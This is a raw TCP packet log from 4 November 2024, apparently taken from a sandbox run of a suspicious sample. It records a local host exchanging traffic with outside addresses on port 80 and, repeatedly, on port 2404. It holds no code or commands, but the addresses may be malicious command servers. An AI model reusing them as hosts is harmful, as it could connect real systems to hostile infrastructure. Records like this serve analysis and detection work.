                                      Nov 4, 2024 09:27:32.539822102 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539851904 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.539899111 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539930105 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.539930105 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.539930105 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.539946079 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539963007 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.539997101 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540059090 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540071964 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540112972 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540172100 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540185928 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540205002 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540230989 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540333986 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540357113 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540368080 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540371895 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540380955 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540385008 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540395975 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540402889 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540422916 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540441990 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540523052 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540534019 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540560961 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540565014 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540580988 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540596008 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540613890 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540626049 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540647984 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540666103 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540719032 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540731907 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540743113 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540766954 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540787935 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.540896893 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540910006 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.540945053 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.582396984 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.582417011 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.582429886 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.582452059 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.582454920 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.582464933 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.582478046 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.582493067 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.582535982 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.582556963 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.582588911 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.650559902 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.650599003 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.650613070 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.650682926 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.650706053 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.650718927 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.650732040 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.650744915 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.650758982 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.650774002 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.650825977 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.650886059 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.650897980 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.650909901 CET8049709212.162.149.38192.168.2.8
                                      Nov 4, 2024 09:27:32.650933027 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:32.650964022 CET4970980192.168.2.8212.162.149.38
                                      Nov 4, 2024 09:27:36.132721901 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:36.137856960 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:36.137959003 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:36.142616034 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:36.147418976 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:36.757503033 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:36.768501043 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:36.768609047 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:36.772842884 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:36.777720928 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:36.777792931 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:36.782733917 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:36.914530039 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:36.916069031 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:36.920989990 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:36.925426006 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:36.927139044 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:36.932019949 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:36.932116985 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:36.941432953 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:36.946332932 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:36.953385115 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:27:36.958362103 CET8049712178.237.33.50192.168.2.8
                                      Nov 4, 2024 09:27:36.958467007 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:27:36.958673000 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:27:36.963468075 CET8049712178.237.33.50192.168.2.8
                                      Nov 4, 2024 09:27:36.971514940 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.553159952 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.564138889 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.564253092 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.568758011 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.573642969 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.573745966 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.578670979 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.714917898 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.714948893 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.714961052 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.714975119 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.715048075 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.715060949 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.715073109 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.715082884 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.715095043 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.715104103 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.715116978 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.715183973 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.715627909 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.715692043 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.715703011 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.715728998 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.715749979 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.715780020 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.720082998 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.720099926 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.720176935 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.819782019 CET8049712178.237.33.50192.168.2.8
                                      Nov 4, 2024 09:27:37.819920063 CET4971280192.168.2.8178.237.33.50
                                      Nov 4, 2024 09:27:37.831756115 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.831783056 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.831795931 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.831834078 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.831846952 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.831883907 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.831908941 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.831921101 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.831955910 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.832276106 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.832314968 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.832328081 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.832357883 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.832650900 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.832693100 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.832694054 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.832706928 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.832739115 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.832784891 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.832797050 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.832823992 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.832871914 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.833606005 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.833636045 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.833647013 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.833647966 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.833672047 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.833749056 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.833760023 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.833770990 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.833789110 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.834564924 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.834588051 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.834599018 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:37.834610939 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:37.834629059 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.027558088 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.331003904 CET497102404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.884593010 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884612083 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884628057 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884641886 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884689093 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884747028 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884756088 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884835958 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.884835958 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.884895086 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884907007 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884917021 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884927988 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.884983063 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.884983063 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885113001 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885123968 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885133982 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885144949 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885154963 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885164022 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885174036 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885181904 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885181904 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885188103 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885199070 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885238886 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885437965 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885448933 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885461092 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885472059 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885509014 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885509014 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885535002 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885546923 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885560036 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885571003 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885581017 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885591984 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885596991 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885602951 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885615110 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885624886 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.885629892 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885629892 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.885654926 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886171103 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886182070 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886190891 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886202097 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886213064 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886224031 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886224985 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886224985 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886235952 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886248112 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886259079 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886270046 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886270046 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886270046 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886281967 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886291981 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886303902 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886315107 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886317968 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886328936 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886368990 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886368990 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886785030 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886833906 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886845112 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.886898994 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.886974096 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.887007952 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.887037992 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.887037992 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.887121916 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.887212992 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.887638092 CET240449710162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.889769077 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.889817953 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.889827967 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.889904022 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.889947891 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.889960051 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.889969110 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.889980078 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890007019 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.890029907 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.890181065 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890240908 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890252113 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890264034 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.890289068 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.890376091 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890388012 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890397072 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890408993 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.890434980 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.890465975 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.890528917 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891236067 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891252041 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891262054 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891273022 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.891295910 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.891360044 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891371012 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891381025 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891446114 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.891510010 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891520977 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.891558886 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.892213106 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892251968 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892263889 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892302036 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.892302036 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.892349005 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892359018 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892445087 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892445087 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.892457962 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892469883 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.892499924 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.893145084 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893192053 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893194914 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.893203974 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893239975 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.893337011 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893347979 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893358946 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893369913 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893394947 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.893419027 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.893423080 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.894172907 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894224882 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894237995 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894239902 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.894269943 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894304991 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.894328117 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894339085 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894390106 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.894414902 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894428015 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.894460917 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.895102978 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895145893 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895155907 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.895157099 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895215988 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.895241022 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895252943 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895263910 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895328045 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.895338058 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895349026 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.895390034 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.896187067 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896198034 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896209002 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896246910 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896250963 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.896250963 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.896358967 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896369934 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896379948 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896389961 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.896414042 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.896452904 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.897070885 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897114038 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897123098 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897125006 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.897169113 CET497112404192.168.2.8162.251.122.106
                                      Nov 4, 2024 09:27:38.897172928 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897520065 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897557020 CET240449711162.251.122.106192.168.2.8
                                      Nov 4, 2024 09:27:38.897564888 CET497112404192.168.2.8162.251.122.106
